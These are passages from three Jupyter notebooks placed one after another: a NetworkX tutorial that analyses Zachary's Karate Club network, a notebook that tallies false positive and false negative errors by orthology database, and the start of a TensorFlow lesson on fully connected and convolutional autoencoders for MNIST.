with_labels=True, arrowsize=25) ``` <div class="alert alert-success"> Can you modify H to reflect the following changes? - Courant now allows its students to enroll in Tandon. - GSAS allows enrollment in Steinhardt, Wagner, and Stern. - Silver no longer wants to participate in any cross-enrolment. **Answer**: <span style="color:white"> H.add_edge('Courant', 'Tandon') H.add_edges_from([('GSAS', 'Steinhardt'),('GSAS', 'Wagner'),('GSAS', 'Stern')]) H.remove_node('Silver') nx.draw(H, with_labels=True, arrowsize=25) </span> ``` H.add_edge('Courant', 'Tandon') H.add_edges_from([('GSAS', 'Steinhardt'),('GSAS', 'Wagner'),('GSAS', 'Stern')]) H.remove_node('Silver') nx.draw(H, with_labels=True, arrowsize=25) ``` ## Importing built-in graphs In the next lesson, we'll learn how to read in graphs from external data sources. For now, perhaps the most interesting way to get a graph is to use built-in graphs! You can find a list of existing graphs, or options for generating certain types of graphs, here: https://networkx.github.io/documentation/stable/reference/generators.html ``` # For example, let's generate a random tree T = nx.random_tree(20) nx.draw(T) # Or, we can import Zachary (1977)'s Karate Club: Z = nx.karate_club_graph() nx.draw(Z) ``` # Analyzing network data Let's stick with Zachary's Karate club and try to learn some more about it. Recall the key facts: - This is a network consisting of 34 members of a Karate club, observed for two years (1970-72). - The teacher, Mr. Hi, and the president, John A. had a dispute about fees. - The club split into two factions, which formed new clubs: Mr. Hi's faction, and John's faction (the officers' club). <div class = "alert alert-warning"> <i>Just a quick side note:</i> For replicating the original paper and general ease of use, I have included a quick bit of helper code in the cell below. You don't need to understand it fully right now, but make sure you've run the cell. ``` # Let's shift the keys by 1 to match the original paper. new_keys = {key: key+1 for key in range(0,34)} nx.relabel_nodes(Z, new_keys, copy=False) # Let's set a standard plot layout pos = nx.spring_layout(Z, seed=2, k=.25) ``` ## Inspecting graphs Reference: https://networkx.github.io/documentation/stable/reference/functions.html We'll rely on the following commands: ```python nx.info(G) # Print a quick summary of the graph G.is_directed() # Check if the graph is directed G.number_of_nodes() # Get count of nodes G.number_of_edges() # Get count of edges G.nodes # Get a list of nodes G.edges # Get a list of edges .data() # Get data attached to nodes/edges .items() # Get list of nodes/edges in iterable format nx.get_node_attributes(G, 'attr') # Get a dictionary of nodes and their values of 'attr' ``` ### Graph size ``` nx.draw(Z, with_labels=True, pos=pos) print(nx.info(Z)) # Let's get the graph size another way n_V = Z.number_of_nodes() n_E = Z.number_of_edges() print(f"Our graph has {n_V} nodes and {n_E} edges.") ``` ### Node data ``` # Let's get the nodes Z.nodes() # Let's get any attributes of nodes ... Z.nodes.data() # Great! There is an attribute called club. Let's extract it: nx.get_node_attributes(Z, 'club') ``` ### Edge data ``` # Let's get the edges Z.edges() # Let's get any attributes of edges ... Z.edges.data() # OK. We can see that there are no attributes. # Instead, let's ask: Are these edges directed? Z.is_directed() ``` Interesting. We see that we have some labels on which club everyone joined (Mr. Hi's or Officer's), but we are using the unweighted version of the graph. As we expect from the paper, it is undirected. <div class="alert alert-success"> <b> Question: </b> What do the edges represent? When Zachary does provide weights, how does he determine them? ## Local structure Reference: https://networkx.github.io/documentation/stable/reference/functions.html We'll use the following commands: ```python nx.neighbors(G, n) # Get a list of neighbors for node n nx.common_neighbors(G, n1, n2) # Get common neighbors for nodes n1 and n2 nx.non_neighbors(G, n) # Get non-neighbors of node n G.degree(n) # Get n's degree G.degree # Get all degrees for all nodes nx.local_bridges(G, with_span=False) # Get a list of all edges that form local bridges nx.number_connected_components(G) # Get count of connected components list(nx.connected_components(G)) # Get a list of connected components ``` Let's take a second look at the graph and start exploring. ``` nx.draw(Z, with_labels=True, pos=pos) ``` ### Exploring neighbors ``` # Node 17 looks lonely. Let's confirm that (s)he's only friends with 6 and 7 list(nx.neighbors(Z, 17)) # Node 1 is important - it's Mr. Hi himself. Let's see who his neighbors are: list(nx.neighbors(Z, 1)) # Do they share any common neighbors? list(nx.common_neighbors(Z,1,17)) nx.draw(Z, pos=pos, with_labels=True) nx.draw_networkx_nodes(Z, nodelist = [17], node_color='yellow', pos=pos) nx.draw_networkx_nodes(Z, nodelist = [1], node_color='green', pos=pos) nx.draw_networkx_nodes(Z, nodelist = list(nx.common_neighbors(Z,1,17)), node_color='blue', pos=pos) plt.show() # Is there anyone that Mr. Hi is not friends with? sorted(list(nx.non_neighbors(Z, 1))) # Let's visualize. Don't worry too much about the code for now nx.draw(Z, pos=pos, with_labels=True, node_color='violet') nx.draw_networkx_nodes(Z, nodelist = [1], node_color='green', pos=pos) nx.draw_networkx_nodes(Z, nodelist = list(nx.neighbors(Z, 1)), node_color='lightgreen', pos=pos) plt.show() ``` ### Exploring degree ``` # How many neighbors does Mr. Hi have after all? Let's get the degree. Z.degree(1) # Actually, we can get the degree of all nodes: Z.degree ``` ### Local bridges ``` # We can even get a list of local bridges. list(nx.local_bridges(Z, with_span=False)) # Recall that a local bridge consists of two nodes who don't share any neighbors # Let's check if they fit the definition: list(nx.common_neighbors(Z,34,20)) # Let's visualize. Don't worry too much about the code for now nx.draw(Z, pos=pos, with_labels=True) nx.draw_networkx_edges(Z, edgelist = list(nx.local_bridges(Z, with_span=False)), edge_color='blue', width=5, pos=pos) plt.show() ``` ### Connected components Reference: https://networkx.github.io/documentation/stable/reference/algorithms/component.html ``` # This graph is kind of un-interesting: there is only one component nx.number_connected_components(Z) # But, we saw that Mr. Hi was a very central node. What happens if he quits Karate altogether? # Let's first copy the graph so we don't overwrite Z Z_without_hi = Z.copy() # Now, remove him Z_without_hi.remove_node(1) # See how many components are left nx.number_connected_components(Z_without_hi) # And, we can see these components -- e.g. list(nx.connected_components(Z_without_hi)) for i in nx.connected_components(Z_without_hi): print(i) # We can plot to confirm nx.draw(Z_without_hi, pos=pos, with_labels=True) nx.draw_networkx_nodes(Z_without_hi, pos=pos, nodelist = list(nx.connected_components(Z_without_hi))[1], node_color='yellow') nx.draw_networkx_nodes(Z_without_hi, pos=pos, nodelist = list(nx.connected_components(Z_without_hi))[2], node_color='blue') plt.show() ``` ## Algorithms We'll use the following commands: ```python nx.average_shortest_path_length(G) # Get average length of the shortest path between any two nodes nx.single_source_shortest_path(G, source) # Get the shortest paths from a given source node nx.shortest_path(G, source, sink) # Get the shortest path between a source and a sink node nx.minimum_cut(G, source, sink, capacity='weight') # Partition the graph using the minimum cut ``` ### Shortest path ``` # Let's get the average shortest path length for this club. We can see that there are only 2.4 degrees of separation! nx.average_shortest_path_length(Z) # We could also get the shortest path to all nodes from a given source, e.g. Mr. Hi nx.single_source_shortest_path(Z, 1) # Finally, we could also get the shortest path for a specific origin and destination. # For example how far is Mr. Hi from John? nx.shortest_path(Z, 1, 34) # We can plot to confirm nx.draw(Z, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[1,32,34], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z, edgelist=[(1,32), (32,34)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` <div class="alert alert-success"> <b> Exercise: </b> - What is the shortest path between John and node 17? - If Mr. Hi leaves, what is the shortest path between John and node 17? (don't forget that we already made the graph: Z_without_hi) **Answer:** <span style="color:white"> nx.shortest_path(Z, 17,34) nx.shortest_path(Z_without_hi, 17,34) ``` # We can plot to confirm nx.draw(Z, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[1,17,7,32,34], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z, edgelist=[(17,7), (7,1), (1,32), (32,34)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` <div class="alert alert-success"> <b> Exercise: </b> - If we add a node between nodes 17 and 27, how will the average shortest path in the graph change? (Don't forget to copy the graph first). **Answer**: <span style='color:white'> Z_copy = Z.copy() Z_copy.add_edge(17,27) old_average = nx.average_shortest_path_length(Z) new_average = nx.average_shortest_path_length(Z_copy) print(f"The average shortest path decreases from {old_average} to {new_average}.") ``` # We can plot to confirm Z_copy = Z.copy() Z_copy.add_edge(17,27) nx.draw(Z_copy, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[17,27], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z_copy, edgelist=[(17,27)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` ### Max flow / min cut Zachary uses a simple model of information flow and conflict: - Information flows between two poles in the network: Mr. Hi's, and John's. - Information flows over edges, i.e. interaction between members. - Information flow increases with the strength of these edges, i.e. the number of interactions. - Bottlenecks in information flow represent weak parts of the network. - These bottlenecks can be used to predict how the network will split in the face of conflict. His two main hypotheses are: <div class = "alert-info"> <br> <b>H1</b>: "[There exists] some structural feature in the network inhibiting information flow between factions." <b>H2</b>: "A bottleneck in the network, representing a structural limitation on information flow from the source to the sink, will predict the break that occurred in the club at the time of the fission." <br> </div> Computationally, he identifies bottlenecks using the maximum-flow minimum-cut labeling procedure of Ford and Fulkerson. In short, - In a network, we can find the **maximum flow** that can be sustained between a source and a sink node. - It is determined by the graph structure and the capacity of the edges in the graph. - This is equivalent in cost to the **minimum cut** needed to partition the graph into two components (one with the source, the other with the sink). - It is defined as the minimum total weight of edges that can be removed from the graph to partition it. - Ford and Fulkerson provide an algorithm for identifying these edges. - If we switch the source and the sink, repeat the min-cut procedure, and still get the same answer, then our cut is unique. > Per Zachary, "intuitively stated, they proved that the maximum flow is equal to the capacity of the smallest possible break in the network separating the source from the sink." <div class="alert alert-warning"> Brief detour: In order to apply the max flow / min cut algorithm to replicate Zachary, we need edge weights. The code below imports and assigns them to our graph. We'll go over importing data from outside sources in the next section. For now, let's take it on faith that we can read in a weighted edgelist from CSV... ``` # Import edge weights... C = pd.read_csv("data/zachary_edge_weights.csv") # ... and add the edges to our graph for edge in np.array(C): u,v,w= edge Z[u][v]['weight'] = w # Make sure it worked Z.edges.data() ``` #### Find the minimum cut ``` source = 1 # Mr. Hi sink = 34 # John A # Let's apply the algorithm to make the minimum cut on the graph cut_value, partition = nx.minimum_cut(Z, source, sink, capacity='weight') # We can inspect the remaining partition of the graph: partition fig, ax = plt.subplots(1,2,figsize=[15,5]) nx.draw(Z, pos=pos, with_labels=True, ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =list(partition[0]), node_color='blue', ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =list(partition[1]), node_color='red', ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =[1,34], node_color='yellow', ax=ax[1]) ax[1].set_title("Factions predicted by algorithm") # Now, let's reconstruct and plot the original mr_hi = [node for node,data in Z.nodes(data=True) if data['club']=='Mr. Hi'] officer = [node for node,data in Z.nodes(data=True) if data['club']=='Officer'] nx.draw(Z, pos=pos, with_labels=True, ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =mr_hi, node_color='blue', ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =officer, node_color='red', ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =[1,34], node_color='yellow', ax=ax[0]) ax[0].set_title("Clubs found in real life") plt.show() ``` We can see that we have replicated Zachary's findings: we have one misprediction, node 9. <img src="figures/zachary_table3.PNG" style="width: 600px;"/> # Exporting NetworkX graphs to other data structures Let's revisit the graph representations from above. Now that we have this nice Karate club graph, we can convert it back into the canonical representations and replicate the adjacency matrix from the paper. We'll use the following commands: ```python nx.to_edgelist(Z) # Convert to edge list nx.to_dict_of_lists(Z) # Convert to a dictionary of lists nx.to_pandas_adjacency(Z) # Convert to an adjacency matrix in pandas nx.to_numpy_matrix(Z) # Convert to an adjacency matrix in numpy ``` ## As edgelist ``` # The simplest representation is a basic edgelist list(nx.to_edgelist(Z)) ``` ## As dictionary ``` # We can also convert to a dictionary of lists nx.to_dict_of_lists(Z) ``` ## As adjacency matrix ``` # To adjacency matrix (the add-ons are to make the print output match the paper) nx.to_pandas_adjacency(Z) .astype(int).sort_index().sort_index(axis=1) ``` <img src="figures/zachary_fig3.PNG" style="width: 700px;"/> # Wrap-up ## Plots Let's end with a simple plot to replicate the classic diagram from Zachary: <img src="figures/zachary_fig1.PNG" style="width: 500px;"/> We will cover graphing in the next notebook, but just for fun... ``` # Let's tell networkX we want a circular layout pos = nx.circular_layout(Z) # We need to jump through some hoops to rotate the graph new_pos = {} for k,v in pos.items(): new_pos[ (k+8)%34 +1 ] = v # And there we go! nx.draw(Z, pos=new_pos, with_labels=True) ``` ## Conclusion We have used the Zachary (1977) Karate club data to practice some simple network analysis. We have learned about graph representations, how to read data into `networkX` graphs, and some basic analytic steps like finding connected components and calculating shortest paths. Next, we'll dig into visualizing graphs using a more complex network as an example. Further reading and tutorials: - http://datenstrom.gitlab.io/cs532-s17/notebooks/karate_club.html - https://petterhol.me/2018/01/28/zacharys-zachary-karate-club/ - http://studentwork.prattsi.org/infovis/labs/zacharys-karate-club/ If you **really** enjoyed yourself today, you should aspire to join the [Zachary Karate Club Club](http://networkkarate.tumblr.com/)!
github_jupyter
# False positive and false negatives > This notebook explores the two sources of systematic error that we identify and trim in our datasets. ``` %matplotlib inline from matplotlib import pyplot as plt import pandas as pd import numpy as np ``` ## False positives > False positives are defined as algorithms that, for a given gene, infer an outsized number of losses for that orthogroup. > My programs output mean number of taxa that the algorithms inferred to have had lost the orthogroup, and variance of this number for each gene. > It also identifies algorithms that have an outsize number of taxa (2 standard deviations above the mean). These are listed in the outlier column, if they were found. ``` stats2 = pd.read_csv("lossStats_HUMAN.csv",index_col=0) stats2.fillna({"mean":np.nan,"variance":np.nan,"outliers":0},inplace=True) stats2.head() ``` ### Let's look at distribution of the mean and variance ``` ax = stats2["variance"].hist(bins=50,color='grey') ax.set_title("Variance histogram, all genes") ax.set_ylabel("Number of genes") #plt.savefig("variance_histogram.svg") stats_outliers = stats2[stats2["outliers"] != 0] ax = stats_outliers["variance"].hist(bins=50,color='grey') ax.set_title("Variance, genes with outliers") ax.set_ylabel("Number of genes") ax = stats2["mean"].hist(bins=50,color='grey') ax.set_title("Histogram of mean values, all genes") ax.set_ylabel("Number of genes") #plt.savefig("mean_histogram.svg") ax = stats_outliers["mean"].hist(bins=50,color='grey') ax.set_title("Mean, genes with outliers") ax.set_ylabel("Number of genes") ``` ### Count number of outliers for each gene ``` stats2['numOutliers'] = stats2['outliers'].map(lambda x: len(x.split(" ")) if x != 0 else 0) stats2.head() stats2["numOutliers"].value_counts() ``` ### Get number of false positives (outliers) for each algorithm ``` FalsePos = pd.Series([db for row in stats2["outliers"] for db in str(row).split()]).value_counts() FalsePos = FalsePos[FalsePos.index != '0'] # don't care about these FalsePos ``` ## False Negatives > False negatives are defined as oversplitting co-ortholog groups. See the paper for an in-depth description. > My programs output a file that, for each gene, says whether or not each algorithm was found to oversplit. ``` ldos = pd.read_csv("HUMAN_LDO_results.csv",index_col=0) ldos.head() ``` ### Get number of false negatives for each algorithm ``` FalseNeg = ldos.apply(pd.value_counts).ix[True] FalseNeg.sort(ascending=False, inplace=True) FalseNeg ``` ### Combine counts of false-negatives and false-positives for each algorithm ``` dbs = ["InParanoid","InParanoidCore","OMA_Groups","OMA_Pairs","PANTHER8_LDO","RSD","EggNOG","Orthoinspector", "Hieranoid_2","EnsemblCompara_v2","Metaphors","PhylomeDB","PANTHER8_all"] errors = pd.DataFrame({"FalsePositive":FalsePos,"FalseNegative":FalseNeg}) errors = errors.reindex(dbs) errors.head() # errors.to_csv("errors_byDatabase.csv") ``` ### Plot counts of errors for each algorithm ``` width = .35 fig, ax1 = plt.subplots() errors["FalseNegative"].plot(kind='bar', ax=ax1, color='grey', width=width, position=1) ax1.set_ylabel("Number Genes False Negative") ax2 = ax1.twinx() errors["FalsePositive"].plot(kind='bar', ax=ax2, color='black', width=width, position=0) ax2.set_ylabel("Number Genes False Positive") ax1.yaxis.grid(False) ax2.yaxis.grid(False) ax1.xaxis.grid(False) ax2.xaxis.grid(False) #plt.savefig("errors_byDatabase.svg") ``` ## Proportional error by database > Normalized error counts by database. ``` normErrors = errors/errors.sum() normErrors["sumErrors"] = normErrors["FalseNegative"] + normErrors["FalsePositive"] normErrors["normSum"] = normErrors["sumErrors"]/normErrors["sumErrors"].sum() normErrors.sum() normErrors["normSum"].plot(kind='bar',color='grey') #plt.savefig("totalErrors.svg") ```
github_jupyter
# Session 3: Unsupervised and Supervised Learning <p class="lead"> Parag K. Mital<br /> <a href="https://www.kadenze.com/courses/creative-applications-of-deep-learning-with-tensorflow/info">Creative Applications of Deep Learning w/ Tensorflow</a><br /> <a href="https://www.kadenze.com/partners/kadenze-academy">Kadenze Academy</a><br /> <a href="https://twitter.com/hashtag/CADL">#CADL</a> </p> <a name="learning-goals"></a> # Learning Goals * Build an autoencoder w/ linear and convolutional layers * Understand how one hot encodings work * Build a classification network w/ linear and convolutional layers <!-- MarkdownTOC autolink=true autoanchor=true bracket=round --> - [Introduction](#introduction) - [Unsupervised vs. Supervised Learning](#unsupervised-vs-supervised-learning) - [Autoencoders](#autoencoders) - [MNIST](#mnist) - [Fully Connected Model](#fully-connected-model) - [Convolutional Autoencoder](#convolutional-autoencoder) - [Denoising Autoencoder](#denoising-autoencoder) - [Variational Autoencoders](#variational-autoencoders) - [Predicting Image Labels](#predicting-image-labels) - [One-Hot Encoding](#one-hot-encoding) - [Using Regression for Classification](#using-regression-for-classification) - [Fully Connected Network](#fully-connected-network) - [Convolutional Networks](#convolutional-networks) - [Saving/Loading Models](#savingloading-models) - [Checkpoint](#checkpoint) - [Protobuf](#protobuf) - [Wrap Up](#wrap-up) - [Reading](#reading) <!-- /MarkdownTOC --> <a name="introduction"></a> # Introduction In the last session we created our first neural network. We saw that in order to create a neural network, we needed to define a cost function which would allow gradient descent to optimize all the parameters in our network <TODO: Insert animation of gradient descent from previous session>. We also saw how neural networks become much more expressive by introducing series of linearities followed by non-linearities, or activation functions. <TODO: Insert graphic of activation functions from previous session>. We then explored a fun application of neural networks using regression to learn to paint color values given x, y positions. This allowed us to build up a sort of painterly like version of an image. In this session, we'll see how to use some simple deep nets with about 3 or 4 layers capable of performing unsupervised and supervised learning, and I'll explain those terms in a bit. The components we learn here will let us explore data in some very interesting ways. <a name="unsupervised-vs-supervised-learning"></a> # Unsupervised vs. Supervised Learning Machine learning research in deep networks performs one of two types of learning. You either have a lot of data and you want the computer to reason about it, maybe to encode the data using less data, and just explore what patterns there might be. That's useful for clustering data, reducing the dimensionality of the data, or even for generating new data. That's generally known as unsupervised learning. In the supervised case, you actually know what you want out of your data. You have something like a label or a class that is paired with every single piece of data. In this first half of this session, we'll see how unsupervised learning works using something called an autoencoder and how it can be extended using convolution.. Then we'll get into supervised learning and show how we can build networks for performing regression and classification. By the end of this session, hopefully all of that will make a little more sense. Don't worry if it doesn't yet! Really the best way to learn is to put this stuff into practice in the homeworks. <a name="autoencoders"></a> # Autoencoders <TODO: Graphic of autoencoder network diagram> An autoencoder is a type of neural network that learns to encode its inputs, often using much less data. It does so in a way that it can still output the original input with just the encoded values. For it to learn, it does not require "labels" as its output. Instead, it tries to output whatever it was given as input. So in goes an image, and out should also go the same image. But it has to be able to retain all the details of the image, even after possibly reducing the information down to just a few numbers. We'll also explore how this method can be extended and used to cluster or organize a dataset, or to explore latent dimensions of a dataset that explain some interesting ideas. For instance, we'll see how with handwritten numbers, we will be able to see how each number can be encoded in the autoencoder without ever telling it which number is which. <TODO: place teaser of MNIST video learning> But before we get there, we're going to need to develop an understanding of a few more concepts. First, imagine a network that takes as input an image. The network can be composed of either matrix multiplications or convolutions to any number of filters or dimensions. At the end of any processing, the network has to be able to recompose the original image it was input. In the last session, we saw how to build a network capable of taking 2 inputs representing the row and column of an image, and predicting 3 outputs, the red, green, and blue colors. Instead if having 2 inputs, we'll now have an entire image as an input, the brightness of every pixel in our image. And as output, we're going to have the same thing, the entire image being output. <a name="mnist"></a> ## MNIST Let's first get some standard imports: ``` # imports %matplotlib inline # %pylab osx import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as colors import matplotlib.cm as cmx # Some additional libraries which we'll use just # to produce some visualizations of our training from libs.utils import montage from libs import gif import IPython.display as ipyd plt.style.use('ggplot') # Bit of formatting because I don't like the default inline code style: from IPython.core.display import HTML HTML("""<style> .rendered_html code { padding: 2px 4px; color: #c7254e; background-color: #f9f2f4; border-radius: 4px; } </style>""") ``` Then we're going to try this with the MNIST dataset, which I've included a simple interface for in the `libs` module. ``` from libs.datasets import MNIST ds = MNIST() ``` Let's take a look at what this returns: ``` # ds.<tab> ``` So we can see that there are a few interesting accessors. ... we're not going to worry about the labels until a bit later when we talk about a different type of model which can go from the input image to predicting which label the image is. But for now, we're going to focus on trying to encode the image and be able to reconstruct the image from our encoding. let's take a look at the images which are stored in the variable `X`. Remember, in this course, we'll always use the variable `X` to denote the input to a network. and we'll use the variable `Y` to denote its output. ``` print(ds.X.shape) ``` So each image has 784 features, and there are 70k of them. If we want to draw the image, we're going to have to reshape it to a square. 28 x 28 is 784. So we're just going to reshape it to a square so that we can see all the pixels arranged in rows and columns instead of one giant vector. ``` plt.imshow(ds.X[0].reshape((28, 28))) # Let's get the first 1000 images of the dataset and reshape them imgs = ds.X[:1000].reshape((-1, 28, 28)) # Then create a montage and draw the montage plt.imshow(montage(imgs), cmap='gray') ``` Let's take a look at the mean of the dataset: ``` # Take the mean across all images mean_img = np.mean(ds.X, axis=0) # Then plot the mean image. plt.figure() plt.imshow(mean_img.reshape((28, 28)), cmap='gray') ``` And the standard deviation ``` # Take the std across all images std_img = np.std(ds.X, axis=0) # Then plot the std image. plt.figure() plt.imshow(std_img.reshape((28, 28))) ``` So recall from session 1 that these two images are really saying whats more or less contant across every image, and what's changing. We're going to try and use an autoencoder to try to encode everything that could possibly change in the image. <a name="fully-connected-model"></a> ## Fully Connected Model To try and encode our dataset, we are going to build a series of fully connected layers that get progressively smaller. So in neural net speak, every pixel is going to become its own input neuron. And from the original 784 neurons, we're going to slowly reduce that information down to smaller and smaller numbers. It's often standard practice to use other powers of 2 or 10. I'll create a list of the number of dimensions we'll use for each new layer. ``` dimensions = [512, 256, 128, 64] ``` So we're going to reduce our 784 dimensions down to 512 by multiplyling them by a 784 x 512 dimensional matrix. Then we'll do the same thing again using a 512 x 256 dimensional matrix, to reduce our dimensions down to 256 dimensions, and then again to 128 dimensions, then finally to 64. To get back to the size of the image, we're going to just going to do the reverse. But we're going to use the exact same matrices. We do that by taking the transpose of the matrix, which reshapes the matrix so that the rows become columns, and vice-versa. So our last matrix which was 128 rows x 64 columns, when transposed, becomes 64 rows x 128 columns. So by sharing the weights in the network, we're only really learning half of the network, and those 4 matrices are going to make up the bulk of our model. We just have to find out what they are using gradient descent. We're first going to create `placeholders` for our tensorflow graph. We're going to set the first dimension to `None`. This is something special for placeholders which tells tensorflow "let this dimension be any possible value". 1, 5, 100, 1000, it doesn't matter. We're going to pass our entire dataset in minibatches. So we'll send 100 images at a time. But we'd also like to be able to send in only 1 image and see what the prediction of the network is. That's why we let this dimension be flexible in the graph. ``` # So the number of features is the second dimension of our inputs matrix, 784 n_features = ds.X.shape[1] # And we'll create a placeholder in the tensorflow graph that will be able to get any number of n_feature inputs. X = tf.placeholder(tf.float32, [None, n_features]) ``` Now we're going to create a network which will perform a series of multiplications on `X`, followed by adding a bias, and then wrapping all of this in a non-linearity: ``` # let's first copy our X placeholder to the name current_input current_input = X n_input = n_features # We're going to keep every matrix we create so let's create a list to hold them all Ws = [] # We'll create a for loop to create each layer: for layer_i, n_output in enumerate(dimensions): # just like in the last session, # we'll use a variable scope to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. with tf.variable_scope("encoder/layer/{}".format(layer_i)): # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = tf.get_variable( name='W', shape=[n_input, n_output], initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02)) # Now we'll multiply our input by our newly created W matrix # and add the bias h = tf.matmul(current_input, W) # And then use a relu activation function on its output current_input = tf.nn.relu(h) # Finally we'll store the weight matrix so we can build the decoder. Ws.append(W) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` So now we've created a series of multiplications in our graph which take us from our input of batch size times number of features which started as `None` x `784`, and then we're multiplying it by a series of matrices which will change the size down to `None` x `64`. ``` print(current_input.get_shape()) ``` In order to get back to the original dimensions of the image, we're going to reverse everything we just did. Let's see how we do that: ``` # We'll first reverse the order of our weight matrices Ws = Ws[::-1] # then reverse the order of our dimensions # appending the last layers number of inputs. dimensions = dimensions[::-1][1:] + [ds.X.shape[1]] print(dimensions) for layer_i, n_output in enumerate(dimensions): # we'll use a variable scope again to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. with tf.variable_scope("decoder/layer/{}".format(layer_i)): # Now we'll grab the weight matrix we created before and transpose it # So a 3072 x 784 matrix would become 784 x 3072 # or a 256 x 64 matrix, would become 64 x 256 W = tf.transpose(Ws[layer_i]) # Now we'll multiply our input by our transposed W matrix h = tf.matmul(current_input, W) # And then use a relu activation function on its output current_input = tf.nn.relu(h) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` After this, our `current_input` will become the output of the network: ``` Y = current_input ``` Now that we have the output of the network, we just need to define a training signal to train the network with. To do that, we create a cost function which will measure how well the network is doing: ``` # We'll first measure the average difference across every pixel cost = tf.reduce_mean(tf.squared_difference(X, Y), 1) print(cost.get_shape()) ``` And then take the mean again across batches: ``` cost = tf.reduce_mean(cost) ``` We can now train our network just like we did in the last session. We'll need to create an optimizer which takes a parameter `learning_rate`. And we tell it that we want to minimize our cost, which is measuring the difference between the output of the network and the input. ``` learning_rate = 0.001 optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost) ``` Now we'll create a session to manage the training in minibatches: ``` # %% # We create a session to use the graph sess = tf.Session() sess.run(tf.initialize_all_variables()) ``` Now we'll train: ``` # Some parameters for training batch_size = 100 n_epochs = 5 # We'll try to reconstruct the same first 100 images and show how # The network does over the course of training. examples = ds.X[:100] # We'll store the reconstructions in a list imgs = [] fig, ax = plt.subplots(1, 1) for epoch_i in range(n_epochs): for batch_X, _ in ds.train.next_batch(): sess.run(optimizer, feed_dict={X: batch_X - mean_img}) recon = sess.run(Y, feed_dict={X: examples - mean_img}) recon = np.clip((recon + mean_img).reshape((-1, 28, 28)), 0, 255) img_i = montage(recon).astype(np.uint8) imgs.append(img_i) ax.imshow(img_i, cmap='gray') fig.canvas.draw() print(epoch_i, sess.run(cost, feed_dict={X: batch_X - mean_img})) gif.build_gif(imgs, saveto='ae.gif', cmap='gray') ipyd.Image(url='ae.gif?{}'.format(np.random.rand()), height=500, width=500) ``` <a name="convolutional-autoencoder"></a> ## Convolutional Autoencoder To get even better encodings, we can also try building a convolutional network. Why would a convolutional network perform any different to a fully connected one? Let's see what we were doing in the fully connected network. For every pixel in our input, we have a set of weights corresponding to every output neuron. Those weights are unique to each pixel. Each pixel gets its own row in the weight matrix. That really doesn't make a lot of sense, since we would guess that nearby pixels are probably not going to be so different. And we're not really encoding what's happening around that pixel, just what that one pixel is doing. In a convolutional model, we're explicitly modeling what happens around a pixel. And we're using the exact same convolutions no matter where in the image we are. But we're going to use a lot of different convolutions. Recall in session 1 we created a Gaussian and Gabor kernel and used this to convolve an image to either blur it or to accentuate edges. Armed with what you know now, you could try to train a network to learn the parameters that map an untouched image to a blurred or edge filtered version of it. What you should find is the kernel will look sort of what we built by hand. I'll leave that as an excercise for you. But in fact, that's too easy really. That's just 1 filter you would have to learn. We're going to see how we can use many convolutional filters, way more than 1, and how it will help us to encode the MNIST dataset. To begin we'll need to reset the current graph and start over. ``` from tensorflow.python.framework.ops import reset_default_graph reset_default_graph() # And we'll create a placeholder in the tensorflow graph that will be able to get any number of n_feature inputs. X = tf.placeholder(tf.float32, [None, n_features]) ``` Since `X` is currently `[batch, height*width]`, we need to reshape it to a 4-D tensor to use it in a convolutional graph. Remember back to the first session that in order to perform convolution, we have to use 4-dimensional tensors describing the: `N x H x W x C` We'll reshape our input placeholder by telling the `shape` parameter to be these new dimensions. However, since our batch dimension is `None`, we cannot reshape without using the special value `-1`, which says that the size of that dimension should be computed so that the total size remains constant. Since we haven't defined the batch dimension's shape yet, we use `-1` to denote this dimension should not change size. ``` X_tensor = tf.reshape(X, [-1, 28, 28, 1]) ``` We'll now setup the first convolutional layer. Remember from Session 2 that the weight matrix for convolution should be `[height x width x input_channels x output_channels]` Think a moment about how this is different to the fully connected network. In the fully connected network, every pixel was being multiplied by its own weight to every other neuron. With a convolutional network, we use the extra dimensions to allow the same set of filters to be applied everywhere across an image. This is also known in the literature as weight sharing, since we're sharing the weights no matter where in the input we are. That's unlike the fully connected approach, which has unique weights for every pixel. What's more is after we've performed the convolution, we've retained the spatial organization of the input. We still have dimensions of height and width. That's again unlike the fully connected network which effectively shuffles or takes int account information from everywhere, not at all caring about where anything is. That can be useful or not depending on what we're trying to achieve. Often, it is something we might want to do after a series of convolutions to encode translation invariance. Don't worry about that for now. With MNIST especially we won't need to do that since all of the numbers are in the same position. Now with our tensor ready, we're going to do what we've just done with the fully connected autoencoder. Except, instead of performing matrix multiplications, we're going to create convolution operations. To do that, we'll need to decide on a few parameters including the filter size, how many convolution filters we want, and how many layers we want. I'll start with a fairly small network, and let you scale this up in your own time. ``` n_filters = [16, 16, 16] filter_sizes = [4, 4, 4] ``` Now we'll create a loop to create every layer's convolution, storing the convolution operations we create so that we can do the reverse. ``` current_input = X_tensor # notice instead of having 784 as our input features, we're going to have # just 1, corresponding to the number of channels in the image. # We're going to use convolution to find 16 filters, or 16 channels of information in each spatial location we perform convolution at. n_input = 1 # We're going to keep every matrix we create so let's create a list to hold them all Ws = [] shapes = [] # We'll create a for loop to create each layer: for layer_i, n_output in enumerate(n_filters): # just like in the last session, # we'll use a variable scope to help 